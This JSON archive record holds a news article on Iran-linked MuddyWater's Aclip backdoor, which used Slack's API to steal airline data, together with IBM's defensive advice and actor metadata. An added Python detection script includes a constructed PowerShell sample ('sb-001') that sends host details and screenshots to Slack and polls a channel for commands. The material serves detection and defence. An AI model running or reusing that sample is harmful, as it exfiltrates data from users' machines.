{
	"id": "e424fbf0-6b34-412d-a0bd-1b89fb8e53ca",
	"created_at": "2026-04-06T00:12:20.695249Z",
	"updated_at": "2026-04-10T03:34:22.682457Z",
	"deleted_at": null,
	"sha1_hash": "760afbe0f2194972a2068ca73d3e29a965c5bfe2",
	"title": "State-sponsored hackers abuse Slack API to steal airline data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2749187,
	"plain_text": "State-sponsored hackers abuse Slack API to steal airline data\r\nBy Bill Toulas\r\nPublished: 2021-12-15 · Archived: 2026-04-05 15:33:09 UTC\r\nA suspected Iranian state-supported threat actor is deploying a newly discovered backdoor named 'Aclip' that abuses the\r\nSlack API for covert communications.\r\nThe threat actor's activity started in 2019 and targeted an unnamed Asian airline to steal flight reservation data.\r\nAccording to a report by IBM Security X-Force, the threat actor is likely ITG17, aka 'MuddyWater,' a very active hacking\r\ngroup that maintains a targets organizations worldwide.\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 1 of 5\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 2 of 5\n\nVisit Advertiser websiteGO TO PAGE\r\nAbusing Slack\r\nSlack is an ideal platform for concealing malicious communications as the data can blend well with regular business traffic\r\ndue to its widespread deployment in the enterprise.\r\nThis type of abuse is a tactic that other actors have followed in the past, so it's not a new trick. Also, Slack isn't the\r\nonly legitimate messaging platform to be abused for relaying data and commands covertly.\r\nIn this case, the Slack API is utilized by the Aclip backdoor to send system information, files, and screenshots to the C2,\r\nwhile receiving commands in return.\r\nIBM researchers spotted the threat actors abusing this communication channel in March 2021 and responsibly disclosed it to\r\nSlack.\r\nSlack issued the following public statement in response:\r\n\"As detailed in this post, IBM X-Force has discovered and is actively tracking a third party that is attempting to\r\nuse targeted malware leveraging free workspaces in Slack. 
As part of the X-Force investigation, we were made aware of free workspaces being used in this manner.\r\nWe investigated and immediately shut down the reported Slack Workspaces as a violation of our terms of service.\r\nWe confirmed that Slack was not compromised in any way as part of this incident, and no Slack customer data was exposed or at risk. We are committed to preventing the misuse of our platform, and we take action against anyone who violates our terms of service.\r\nSlack encourages people to be vigilant and to review and enforce basic security measures, including the use of two-factor authentication, ensuring that their computer software and anti-virus software are up to date, creating new and unique passwords for every service they use, and exercising caution when interacting with people they don't know.\" - Slack.\r\nThe Aclip backdoor\r\nAclip is a newly observed backdoor executed via a Windows batch script named 'aclip.bat,' hence the name.\r\nThe backdoor establishes persistence on an infected device by adding a registry key so that it launches automatically at system startup.\r\nAclip receives PowerShell commands from the C2 server via Slack API functions and can be used to execute further commands, send screenshots of the active Windows desktop, and exfiltrate files.\r\nAclip operational diagram\r\nSource: IBM\r\nUpon first execution, the backdoor collects basic system information, including hostname, username, and external IP address. This data is Base64-encoded (an encoding, not encryption, so it provides no confidentiality, only obscurity) and exfiltrated to the threat actor.\r\nFrom then on, the command execution query phase begins, with Aclip connecting to a different channel on the actor-controlled Slack workspace.\r\nScreenshots are taken using PowerShell's graphics library and saved to %TEMP% until exfiltration. 
After the images have been uploaded to the C2, they are wiped.\r\nIBM linked the attack to MuddyWater/ITG17 after its investigation found two custom malware samples known to be attributed to the hacking group.\r\n\"The investigation yielded two custom tools that correspond to malware previously attributed to ITG17, a backdoor ‘Win32Drv.exe,’ and the web shell ‘OutlookTR.aspx’,\" explains IBM's report.\r\n\"Within the configuration of Win32Drv.exe is the C2 IP address 46.166.176[.]210, which has previously been used to host a C2 domain associated with the Forelord DNS tunneling malware publicly attributed to MuddyWater.\"\r\nHow to defend\r\nDetecting traffic that blends so well with remote collaboration tools such as Slack can be challenging, especially during a remote work boom that creates more hiding opportunities for actors.\r\nIBM suggests focusing on strengthening your PowerShell security stance instead and proposes the following measures:\r\nFrequently check PowerShell logs and module logging records\r\nLimit PowerShell access to only specific commands and functions for each user\r\nDisable or restrict Windows Remote Management Service\r\nCreate and use YARA rules to detect malicious PowerShell scripts\r\nHowever, IBM warns that the abuse of messaging applications will continue to evolve as the enterprise increasingly adopts these solutions.\r\n\"With a wave of businesses shifting to a permanent or wide adoption of a remote workforce, continuing to implement messaging applications as a form of group production and chat, X-Force assesses that these applications will continue to be used by malicious actors to control and distribute malware undetected,\" concluded IBM.\r\n
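One way to act on IBM's first recommendation (reviewing PowerShell script block logs), as an added example that is not from the article or from IBM's report: a small Python triage script that scores the text of PowerShell script block entries (Event ID 4104 ScriptBlockText, which requires script block logging to be enabled) for the combination the article describes, Slack Web API calls, an embedded Slack token, Base64 encoding of host data, screenshot capture, and staging in %TEMP%. The three log entries are constructed for this demo and do not reproduce Aclip's code; the indicator lists, weights and threshold are assumptions to tune locally, while the Slack method names and the xoxb/xoxp token prefixes are Slack's publicly documented ones.

```python
# Added example (not from the article or IBM's report): score PowerShell
# script-block log text for the Slack-API backdoor pattern the article
# describes. Indicators, weights, threshold and sample entries are assumptions
# constructed for this demo, not Aclip's actual code.
import re
from dataclasses import dataclass, field

# Slack Web API methods a Slack-based backdoor needs: post host info,
# poll a channel for operator commands, upload files and screenshots.
SLACK_API_METHODS = ('chat.postMessage', 'conversations.history',
                     'files.upload', 'files.getUploadURLExternal')
# Slack bot/user token prefixes (Slack's public token format).
TOKEN_RE = re.compile('xox[bp]-[A-Za-z0-9-]+')
# Supporting building blocks from the article: Base64 encoding of host data,
# screenshot capture via .NET drawing classes, staging in %TEMP%, host recon.
INDICATORS = {
    'base64': ('ToBase64String', 'FromBase64String'),
    'screenshot': ('System.Drawing', 'CopyFromScreen'),
    'temp_staging': ('$env:TEMP', '%TEMP%'),
    'host_recon': ('$env:COMPUTERNAME', '$env:USERNAME', 'hostname'),
}


@dataclass
class Finding:
    script_id: str
    score: int
    reasons: list = field(default_factory=list)


def score_script_block(script_id, text):
    # Score one script block; 0 means nothing suspicious was seen.
    # The combination matters: API use plus exfiltration building blocks.
    f = Finding(script_id, 0)
    methods = [m for m in SLACK_API_METHODS if m in text]
    if 'slack.com/api/' in text or methods:
        f.score += 3
        f.reasons.append('slack api: ' + ', '.join(methods))
    if TOKEN_RE.search(text):
        f.score += 3
        f.reasons.append('embedded slack token')
    for name, needles in INDICATORS.items():
        if any(n in text for n in needles):
            f.score += 1
            f.reasons.append(name)
    return f


def triage(blocks, threshold=5):
    # Return findings at or above the threshold, highest score first.
    findings = [score_script_block(sid, text) for sid, text in blocks]
    return sorted((f for f in findings if f.score >= threshold),
                  key=lambda f: -f.score)


# Constructed sample ScriptBlockText values: one backdoor-like block, one
# routine admin script, one legitimate Slack incoming-webhook notifier.
SAMPLE_BLOCKS = [
    ('sb-001', '''
$hdr = @{ Authorization = 'Bearer xoxb-0000000000-0000000000000-constructedtoken' }
$info = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + '|' + $env:USERNAME))
Invoke-RestMethod -Uri 'https://slack.com/api/chat.postMessage' -Headers $hdr -Method Post -Body @{ channel = 'C01CONSTRUCTED'; text = $info }
$cmds = Invoke-RestMethod -Uri 'https://slack.com/api/conversations.history?channel=C02CONSTRUCTED' -Headers $hdr
Add-Type -AssemblyName System.Drawing
$bmp = New-Object System.Drawing.Bitmap 1920, 1080
$g = [System.Drawing.Graphics]::FromImage($bmp); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size)
$bmp.Save((Join-Path $env:TEMP 'screen.png'))
Invoke-RestMethod -Uri 'https://slack.com/api/files.upload' -Headers $hdr -Method Post -Form @{ file = Get-Item (Join-Path $env:TEMP 'screen.png') }
'''),
    ('sb-002', '''
Get-Service | Where-Object Status -eq 'Running' | Export-Csv (Join-Path $env:TEMP 'services.csv')
'''),
    ('sb-003', '''
$body = @{ text = 'Nightly backup finished on ' + $env:COMPUTERNAME } | ConvertTo-Json
Invoke-RestMethod -Uri 'https://hooks.slack.com/services/T000/B000/constructed' -Method Post -Body $body
'''),
]

if __name__ == '__main__':
    for f in triage(SAMPLE_BLOCKS):
        print(f.script_id, f.score, '; '.join(f.reasons))
```

Only the backdoor-like block crosses the threshold; the webhook notifier touches hooks.slack.com rather than the Web API and carries no token, and the admin script only writes to %TEMP%, so both stay below it. The same scoring can be fed from Get-WinEvent output on a host or from a SIEM export, and the threshold should be raised or lowered after checking what legitimate automation in the environment looks like.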
Source: https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/"
	],
	"report_names": [
		"state-sponsored-hackers-abuse-slack-api-to-steal-airline-data"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/760afbe0f2194972a2068ca73d3e29a965c5bfe2.pdf",
		"text": "https://archive.orkl.eu/760afbe0f2194972a2068ca73d3e29a965c5bfe2.txt",
		"img": "https://archive.orkl.eu/760afbe0f2194972a2068ca73d3e29a965c5bfe2.jpg"
	}
}